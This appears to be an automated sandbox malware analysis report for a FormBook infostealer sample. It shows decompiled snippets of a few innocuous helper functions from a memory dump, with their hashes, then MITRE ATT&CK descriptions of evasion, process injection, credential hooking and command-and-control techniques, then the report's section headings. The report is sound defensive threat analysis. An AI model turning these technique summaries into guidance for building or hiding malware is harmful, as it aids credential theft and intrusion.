API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: dbae23f26c05167c35c1b86bcc0fd36f98aab07d26ab1eb419e38f5faabe5d82
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 56C08C32180248BBC7126E41DC00F017B2AE790B60F040020B6040B5708932EC60D98C

Uniqueness

Uniqueness Score: -1.00%

Function 046076E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046076E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x046076e4
0x00000000
0x046076f8
0x046076fd

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: c746605174e108cd378c1dede09538f046c9ae58f42b99edbf807d5742350696
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 9DC08C703A11805AEB2E6B08CE20B223650AB1870AF48019CAA02096F1E368B802C208

Uniqueness

Uniqueness Score: -1.00%

Function 046236CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E046236CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x046236d2
0x046236e8
0x046236d4
0x046236e5
0x046236e5

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 6b9a85662ba132cf1c6d04549357843a20fc42da035b4286dec0652de6b56030
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 71C02BB0350840FBE7151F30CE00F147258F700B25F68035872204A6F0FE2CBC00D904

Uniqueness

Uniqueness Score: -1.00%

Function 04617D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04617D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04617d56
0x04617d5b
0x04617d60
0x04617d5d
0x04617d5d
0x04617d5d

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: d36b81bcbcfb758b01b058952479213d55a5e0a6d2109439ed7ade6c597eaa45
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 37B092343019408FCF16DF18C080B1533F4FB48A40F8840D1E400CBA20E229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 04622ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04622ACB() {
				void* _t5;

				return E0460EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04622adc

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 42e75f3d3a65858af21fae522c56a475f04412b104832e1e8301fb1e3659c0f0
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 13B01232C10450CFCF06FF40C710B1A7331FB00750F058894900127970C329BC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0468FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0468FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0463CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04685720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04685720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0468fdda
0x0468fde2
0x0468fde5
0x0468fdec
0x0468fdfa
0x0468fdff
0x0468fe0a
0x0468fe0f
0x0468fe17
0x0468fe1e
0x0468fe19
0x0468fe19
0x0468fe19
0x0468fe20
0x0468fe21
0x0468fe22
0x0468fe25
0x0468fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0468FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0468FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0468FE2B

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: db396b01a033f6498d68d96da4e7ec56ec4c062138bae2ac40c70193f099d6d9
Instruction ID: 3e109ecd53d212792035205ee32ffeab5a55194301b470d072fa495250e6788d
Opcode Fuzzy Hash: db396b01a033f6498d68d96da4e7ec56ec4c062138bae2ac40c70193f099d6d9
Instruction Fuzzy Hash: 3EF0F632200201BFE6242A46DC06F33BB5EEB44730F144319F628561D1FA62F860D6F8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report w73FtMA4ZTl9NFm.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers